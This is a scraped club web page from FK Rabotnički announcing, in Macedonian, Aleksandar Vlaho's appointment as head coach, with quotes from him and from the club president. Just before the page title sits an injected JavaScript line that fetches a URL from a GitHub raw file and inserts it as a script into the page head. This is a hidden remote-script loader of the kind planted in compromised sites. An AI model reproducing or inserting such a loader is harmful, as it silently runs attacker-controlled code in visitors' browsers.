;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Александар Влахо нов шеф на стручниот штаб на Работнички
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Александар Влахо нов шеф на стручниот штаб на Работнички

Работнички го именуваше Александар Влахо за нов шеф на стручниот штаб. Раководството на клубот одлучи да му даде нова шанса на Влахо да застане на кормилото на тимот и да го води во пролетниот дел од првенството.

„Влахо е млад, квалитетен и мошне амбициозен тренер кој заслужува да добие нова шанса на клупата на Работнички. Раководството на клубот има максимална доверба во неговиот капацитет, тој и во претходниот престој покажа дека е голем работник и потполно се вклопува во стратегијата на клубот за форсирање млади и талентирани фудбалери. Тој многу добро ја знае атмосферата во Работнички и му посакуваме многу успех на кормилото на тимот“, вели претседателот на клубот, Драган Поповски.

Александар Влахо беше на клупата на Работнички на почетокот на сезоната 2019/20, претходно има големо искуство како дел од стручниот штаб на Вардар во најплодниот резултатски период, како и интернационално искуство од Динамо Загреб, Рига и од Широки Бријег.

„Сакам да искажам благодарност до раководството на Работнички за новата соработка, за мене е голема чест да го предводам тимот, но секако и голема обврска. Можам да ветам напорна работа, со надеж за добри резултати во пролетниот дел од сезоната кои ќе го одведат тимот кон горниот дел од табелата во Првата лига“, истакнува новиот шеф на стручниот штаб, Александар Влахо.

Работнички ќе ги стартува зимските подготовки на 8. јануари, со почеток во 12 часот во клупската база.